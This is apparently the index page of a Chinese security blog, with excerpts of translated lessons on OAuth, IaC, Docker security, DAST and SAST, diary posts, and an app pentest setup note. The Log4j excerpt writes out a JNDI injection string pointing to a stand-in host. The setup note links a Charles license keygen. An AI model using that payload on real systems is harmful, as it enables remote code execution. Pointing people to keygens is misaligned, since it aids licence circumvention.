MikannseのSekai

Introduction在现代 Web 应用程序中，OAuth 漏洞是一个严重且经常被忽视的风险；我们所说的 OAuth，指的是 OAuth 2.0，这个常用的授权框架。当黑客利用 OAuth 2.0 中的漏洞时，就会出现这些漏洞，这些漏洞会导致 CSRF、XSS、数据泄露以及其他漏洞的利用。 学习目标 通过本课程，您将全面了解以下关键概念： OAuth 2.0 的基本概念（授权类型） OAuth 2.0 流程 识别 OAuth 服务 漏洞利用技术 OAuth 2.1 的演变 建议您在开始本课程之前了解以下主题： OWASP Top 10 协议与服务器 网站工作原理 开始吧！ Key Concepts本任务将讨论理解 OAuth，特别是 OAuth 2.0 的关键概念。这些概念构成了理解 OAuth 2.0 框架构建方式的基础。作为一名渗透测试人员或安全程序员，理解这些概念对于渗透测试网站或编写无漏洞代码至关重要。为了使这些概念更容易理解，我们将通过一个日常示例来解释：使用咖啡店的移动应用程序订购和支付咖啡。 资源所有者资源所有者是控制某些数据并可以授权应用程序代表其访问这些数 ...

前言记录一些自己在做APP渗透测试装环境的时候的一些问题以及解决方法，本人使用雷电模拟器配合Charles进行抓包 Charles官方安装Chalres https://www.charlesproxy.com/ Windows给的是.appx，其实可以压缩工具打开，直接将Charles目录复制出来即可。注册码可以使用各种网站生成，比如:https://inused.github.io/pages/file/tool/CharlesKeygen.html 用户名随便填。 其他配置参考: https://www.cnblogs.com/jiajunling/p/16160453.html 雷电模拟器模拟器需要先开启桥接模式，在右边的”设置”->”网络”中->”自定义”，桥接网卡选择WIFI的网卡,IP填个能用的就行，网关和掩码通过电脑cmd ipconfig查看。证书的下载和上面那个链接说的差不多，手机先连接，然后访问chls.pro/ssl下载即可。不过需要将证书安装至系统信任的证书下才行，不能直接在手机中安装。 所以也可以在”Help”->”SSL Proxying ...

又是五月底了才写上个月的杂谈，唉，发生了一些事吧，月底基本处于崩溃状态。四月，打了红明谷和数字中国，前者是神仙打架，被打的毫无还手之力，后者被队友带飞了，混了个奖，然后则又是参加了一年一度的教育护，又是混了个三等，过程收获还是蛮大的。五月开启新生活了。

前言原理概述Apache Log4j 2 是Java语言的日志处理套件，在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意代码。 JNDI简单介绍JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口，JNDI提供统一的客户端API，通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现，由管理者将JNDI API映射为特定的命名服务和目录系统，使得Java应用程序可以和这些命名服务和目录服务之间进行交互。JNDI注入主要是用过下载远程class，来运行恶意代码。JNDI注入攻击时常用的就是通过RMI和LDAP两种服务。 漏洞侦察漏洞可能存在于应用程序记录数据的任何位置。 这就是这种脆弱性的症结所在。不幸的是，很难确定不同应用程序的攻击面在哪里，因此，哪些应用程序实际上是脆弱的。仅仅看到log4j文件的存在并不能说明确切的版 ...

还是在摆烂的3月，完成了寒假开的新坑，但是懒得混音了。期间去打了长城杯半决，打的依托。。。然后就是不断地面试，准备暑假的实习了。没怎么学新的东西，月底润出去玩了一周。

Introduction探索基础设施即代码 (IaC) 的基础知识及其在现代云计算中的关键作用。我们将重点介绍使用 AWS CloudFormation 和 Terraform 的基于云的 IaC 用例，这些用例能够以可扩展、高效且安全的方式创建和管理云资源。 学习前提条件 从任务 2 开始，将参考 IaC 简介 房间中定义的概念和工具特性，因此完成这项工作是个好主意！ 学习目标 了解基于云的 IaC 概念 安全的 IaC 实践 基于云的 IaC 中的安全注意事项 Terraform 101Terraform 概述 Terraform 是一种用于配置的基础设施即代码工具，它允许用户在人性化配置文件中定义云和本地资源，该文件可以进行版本控制、重复使用和跨团队分发。Terraform 使用一致的工作流使基础设施的管理变得简单而可靠。此房间中的后续任务将介绍此配置和 Terraform 遵循的工作流。现在，让我们定义一些术语，这些术语对于理解 Terraform 如何配置和管理基础设施至关重要： Terraform 的架构 现在我们知道了 Terraform 的作用。让我们来看看它是如何 ...

Introduction在这个房间里，您将了解本地基础设施即代码 (IaC) 部署。虽然这在基于云的世界中似乎已经过时，但进行本地部署而不是云部署确实有一些很好的理由，尤其是在受到严格监管的行业中。 先决条件 基本的进攻性安全技术和技能 IaC 简介 学习目标 了解本地 IaC 的原因 了解本地 IaC 的优点和缺点 理解并知道如何使用 Vagrant 理解并知道如何使用 Ansible 了解 Ansible 和 Vagrant 的安全问题 Why On-Premises本地 IaC 是指使用基础设施即代码在内部网络上部署系统和服务。本质上，所有将托管系统和服务的基础设施都可以在组织的数据中心本地找到。 采用本地 IaC 的原因 在当今世界，我们拥有多家云提供商，使用本地 IaC 似乎违反直觉。但是，在某些情况下，本地 IaC 更适合您的需求。最大的好处是它可以让您更好地控制整个 IaC 管道。让我们使用另一个流行的例子，GitHub 与自托管 GitLab，作为案例研究。 GitHub 和 GitLab 是两个流行的源代码管理平台，由流行的版本控制软件 Git 支持，被组织广 ...

z在使用jdk1.8运行shiro_attack 2.2的时候，报了”unable to allocate file descriptor table”的错。排查了半天，找到了原因和解决办法 https://stackoverflow.com/questions/49435109/error-upon-jar-execution-unable-to-allocate-file-descriptor-table 在*/etc/security/limits.conf*中添加 * soft nofile 4096* hard nofile 1048576 后重启解决

快四月了才更新2月杂谈()寒假在家一直打游戏，然后做点算法题然后学学go什么的。基本没做别的什么事情，开学之后忙于制作简历然后投递吧，要准备实习了。

Introduction到目前为止，本模块已向您介绍了 Docker 的基础知识以及与容器相关的潜在漏洞。本房间将向您介绍保护容器的各种方法。 学习目标 保护 Docker 守护进程以防止未经授权的交互。 正确分配容器的权限（功能）。 防止有故障或恶意的容器耗尽系统。 利用 Seccomp 和 AppArmor 等安全功能来定义容器与操作系统的行为方式。 通过检查 Docker 映像是否存在漏洞来养成良好的卫生习惯 - 实施检查代码是否存在漏洞的框架和工具。 先决条件 为了完成本房间，您必须熟悉 Docker 的各个组件。我强烈建议在继续之前完成 Docker 简介 房间。 Protecting the Docker Daemon您可能还记得 容器漏洞 房间中提到，Docker 守护程序负责处理请求，例如管理容器以及将图像拉取或上传到 Docker 注册表。Docker 可以远程管理，并且通常在 CI（持续集成）和 CD（持续开发）管道中完成。例如，在另一台主机上的容器中推送和运行新代码以检查错误。 如果攻击者可以与 Docker 守护程序交互，他们就可以与容器和图像交互。例如，他 ...

Introduction测试应用程序漏洞的众多方法之一是获取正在运行的实例并像外部攻击者一样对其进行攻击。此过程称为动态应用程序安全测试 (DAST)，将成为当前房间的重点。 房间目标 了解如何应用 DAST 来查找实际应用程序中的弱点。 了解使用 DAST 而不是其他技术的利弊。 熟悉用于 DAST 的一些工具。 房间先决条件 在尝试这个房间之前，您应该了解 Web 应用程序和 HTTP 协议的工作原理。了解常见的 Web 漏洞也是可取的。如果您需要复习上述任何主题，请务必查看以下房间： 网站工作原理 HTTP 详细信息 OWASP Top 10 Dynamic Application Security Testing (DAST)什么是 DAST？ 动态应用程序安全测试 (DAST) 是测试正在运行的 Web 应用程序实例是否存在弱点和漏洞的过程。它侧重于黑盒测试方法，在这种方法中，漏洞的发现方式与普通攻击者发现漏洞的方式一样。简而言之，DAST 通过尝试利用漏洞来识别漏洞，无论是手动还是通过自动化工具。 通过从外部角度测试应用程序，我们可以从其内部工作中抽象出来，专注于识 ...

Introduction在这个房间里，我们将研究静态应用程序安全测试 (SAST)，它是在应用程序开发生命周期中用于检测漏洞的众多工具之一。我们将研究它的优点和缺点，以及它如何补充其他方法，以确保应用程序在开发早期的安全。 学习目标 了解如何应用 SAST 来查找实际应用程序中的弱点。 了解使用 SAST 的利弊。 熟悉如何在开发生命周期中实施 SAST。 房间先决条件 在继续这个房间之前，熟悉 Web 漏洞非常重要，如 OWASP Top 10 和 OWASP API Top 10 房间中所示。掌握一些软件开发生命周期各个阶段的基本知识也是可取的，因此，如有需要，请随时查看 SDLC 室。 Code Review开发安全应用程序的方法之一是通过称为代码审查的过程频繁测试代码是否存在安全漏洞。代码审查包括查看应用程序的源代码，使用白盒方法搜索可能的漏洞。通过访问代码，审查者可以保证更大程度地覆盖应用程序的功能，并减少查找错误所需的时间。 如果不加以处理，在开发过程早期引入的漏洞将传播到项目结束时，而解决漏洞将更加费力且成本更高。代码审查将尝试尽早发现此类漏洞，因为这些漏洞更容易修复 ...